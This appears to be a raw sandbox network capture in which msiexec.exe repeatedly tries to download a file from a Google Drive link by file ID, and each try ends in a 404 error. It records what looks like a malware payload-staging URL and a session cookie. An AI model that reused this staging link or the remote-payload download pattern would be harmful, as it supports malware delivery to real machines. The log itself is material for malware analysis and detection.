    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
2025-03-07 21:47:11 UTC | 1541              | IN        | HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AKDAyIvaT_FsB5T4MApT0qYxeqLJQeeG9ZHXoS7IB0dICJjTKDKt8rZL9phS1qsscNTSrq4X8AFt2mg
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Fri, 07 Mar 2025 21:47:11 GMT
    Content-Security-Policy: script-src 'nonce-FDTODOVFQM1wbLyzoep_zg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2025-03-07 21:47:11 UTC | 1541              | IN        | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CE37CgZyzFhVKm9Gv4jeDQ">*{margin:0;padding:0}html,code{font:15px/22px arial
2025-03-07 21:47:11 UTC | 111               | IN        | Data Ascii: ts an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
10         | 192.168.2.4 | 49730       | 216.58.206.78  | 443              | 6128 | C:\Windows\SysWOW64\msiexec.exe

Timestamp               | Bytes transferred | Direction | Data
2025-03-07 21:47:14 UTC | 428               | OUT       | GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
    Host: drive.google.com
    Cache-Control: no-cache
    Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
2025-03-07 21:47:15 UTC | 1610              | IN        | HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Fri, 07 Mar 2025 21:47:15 GMT
    Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
    Strict-Transport-Security: max-age=31536000
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'nonce-1_-dz1COsmvBzpR7BW6geA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        11 | 192.168.2.4 | 49731 | 142.250.185.193 | 443 | 6128 | C:\Windows\SysWOW64\msiexec.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-03-07 21:47:17 UTC | 470 | OUT | GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:18 UTC | 1534 | IN | HTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AKDAyItvr43sqFEK18D-MIvr7_JOqqafiMAAvD_0w3qSTROtbcbgoEYNK3g6a4bsjpvxZDnP
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:18 GMT
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-iQwA3_V-zkBtV6BudbnVRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-03-07 21:47:18 UTC | 1534 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 74 76 48 36 67 36 73 6b 78 2d 74 2d 63 6b 78 2d 68 4a 6a 63 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UtvH6g6skx-t-ckx-hJjcA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                        2025-03-07 21:47:18 UTC | 118 | IN | Data Raw: 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                        Data Ascii: ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        12 | 192.168.2.4 | 49732 | 216.58.206.78 | 443 | 6128 | C:\Windows\SysWOW64\msiexec.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-03-07 21:47:20 UTC | 428 | OUT | GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:21 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:21 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: script-src 'nonce-soYRFxpV3YSljxfUr5doFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        13 | 192.168.2.4 | 49733 | 142.250.185.193 | 443 | 6128 | C:\Windows\SysWOW64\msiexec.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-03-07 21:47:23 UTC | 470 | OUT | GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:24 UTC | 1533 | IN | HTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AKDAyItVP6KBCJiYnnOULBs6eXNzoUNh4SL6Vbi6KFTpmIkgw7MpOSWQ54ZQgSxZh5KRwJo
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:24 GMT
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-YZFBQuBGiBlM1orMALjLnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-03-07 21:47:24 UTC | 1533 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 5f 64 7a 67 58 6f 33 4f 69 5a 6f 68 6f 49 32 77 38 52 62 6f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="L_dzgXo3OiZohoI2w8Rbow">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                        2025-03-07 21:47:24 UTC | 119 | IN | Data Raw: 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                        Data Ascii: <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        14 | 192.168.2.4 | 49734 | 216.58.206.78 | 443 | 6128 | C:\Windows\SysWOW64\msiexec.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-03-07 21:47:27 UTC | 428 | OUT | GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:28 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:27 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-3SPWfDHpfxVyVVOJGfsnOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        15 | 192.168.2.4 | 49735 | 142.250.185.193 | 443 | 6128 | C:\Windows\SysWOW64\msiexec.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-03-07 21:47:30 UTC | 470 | OUT | GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:31 UTC | 1534 | IN | HTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AKDAyIvYwCVZxydY2udRoMitiYkCKNVVrLFFopZAcWrzVGvK-oHqO3m3QwGH94l8LpO8I9iK
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:30 GMT
                                                                        Content-Security-Policy: script-src 'nonce-HT1WniQf0xtBizMk7m7kpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-03-07 21:47:31 UTC | 1534 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 50 4b 78 65 47 74 77 52 41 30 6c 4d 51 5f 4a 64 50 6c 77 54 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OPKxeGtwRA0lMQ_JdPlwTw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                        2025-03-07 21:47:31 UTC | 118 | IN | Data Raw: 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                        Data Ascii: ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        16 | 192.168.2.4 | 49736 | 216.58.206.78 | 443 | 6128 | C:\Windows\SysWOW64\msiexec.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2025-03-07 21:47:33 UTC | 428 | OUT | GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:34 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:33 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: script-src 'nonce-ueJTfmeTPxzcWANYXSnMvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
